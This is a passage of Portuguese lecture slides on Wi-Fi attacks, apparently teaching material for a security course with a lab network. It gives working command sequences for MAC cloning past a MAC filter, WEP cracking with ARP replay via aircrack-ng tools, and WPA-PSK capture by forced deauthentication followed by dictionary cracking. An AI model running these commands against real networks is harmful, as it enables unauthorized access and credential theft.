    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico
  • 70.
    Ataques 1 – APcom SSID escondido e filtro de MAC Alvo envia um quadro Clonagem de MAC: AP verifica MAC origem Atacante Alvo OK ! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D OK ! 11:11 AA:AA 10.1.1.2 200.1.1.1
  • 71.
    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC: Atacante Alvo Volta a resposta ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 72.
    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC: As duas placas de Atacante Alvo rede aceitam... e repassam para o IP ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 73.
    Ataques IP destino = 10.1.1.1? 1 – AP com SSID escondido e filtro de MAC NÃO ! Eu sou um roteador? Clonagem de MAC: NÃO ! Atacante Alvo → descarta o pacote !!! ... ... AP 10.1.1.1 10.1.1.2 IP AA:AA AA:AA MAC MAC Físico Físico Físico Físico MAC D | MAC O | IP O | IP D AA:AA 11:11 200.1.1.1 10.1.12
  • 74.
    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC: Ou seja... Duas máquinas com mesmo MAC e IP's diferentes podem “navegar” simultaneamente (layer3) … afinal é possível ter uma máquina com mais de um IP vinculado na mesma placa de rede....
  • 75.
    Ataques 1 –AP com SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: # killall nm-applet # ip l s wlan0 down # ip l s wlan0 address 00:1b:77:b9:51:49 # ip a a 10.1.0.200/24 dev wlan0 # ip l s wlan0 up # iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8 # tail -f /var/log/syslog --------------------------------- kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e kernel: [ 225.757365] wlan0: beacon received kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1) kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401 status=0 aid=1) kernel: [ 225.785943] wlan0: associated
  • 76.
    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC e associação com AP: - não utilizar o serviço de DHCP... - configurar na mão: → roteador default → servidor de DNS
  • 77.
    Ataques 1 – APcom SSID escondido e filtro de MAC Clonagem de MAC e associação com AP:
  • 78.
    Ataques 2 – Quebrade WEP via software Vulnerabilidade – PRNG do RC4 gerando chaves fracas... Técnica: 1. captura de pacotes cifrados com diferentes IVs 2. análise dos pacotes (software) para obtenção do segredo compartilhado
  • 79.
    Ataques 2 – Quebrade WEP via software Passos: 1. colocar a placa de rede em modo monitor para captura do tráfego cifrado: # ip l s wlan0 down # iwconfig wlan0 mode monitor # iwconfig wlan0 channel 8 # ip l s wlan0 up
  • 80.
    Ataques 2 – Quebrade WEP via software Passos: 2. instalação do software aircrack-ng # apt-get install aircrack-ng 3. captura do tráfego (descoberta das redes) # airodump-ng wlan0
  • 81.
    Ataques 2– Quebra de WEP via software Passos: 4. em outro terminal – captura do tráfego cifrado de uma rede específica para posterior análise # airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1 wlan0 5. para diminuir tempo, geração de tráfego (requisição de autenticação com o AP) # aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0
  • 82.
    Ataques 2 –Quebra de WEP via software Passos: 6. captura da requisição de autenticação (os pacotes ARP) e repetição dos mesmos para geração de mais tráfego # aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62 wlan0 7. Após obter um número significativo de pacotes, tentar a análise... # aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
  • 83.
    Ataques 2 – Quebrade WEP via software Obs: necessário grande volume de tráfego para análise... porém, com tráfego suficiente, sempre se consegue o segredo compartilhado
  • 84.
    Ataques 3 – Quebrade WPA via software Vulnerabilidade: Mesmo protocolo de autenticação do WEP quando utilizado PSK Técnica: Obtenção dos quadros de associação e posterior força bruta na PSK
  • 85.
    Ataques 3– Quebra de WPA via software Passos: 1. colocar a placa de rede em modo monitor 2. monitorar com airodump-ng 3. captura de pacotes cifrados (especificar WPA) # airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
  • 86.
    Ataques 3 –Quebra de WPA via software Passos: 4. força a desautenticação de um cliente para captura dos quadros de autenticação (falsifica mensagem de desaut. do AP) # aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0 5. utiliza força bruta (dicionário) para tentar obter PSK # aircrack-ng -w dicionario.txt wpa1-01.cap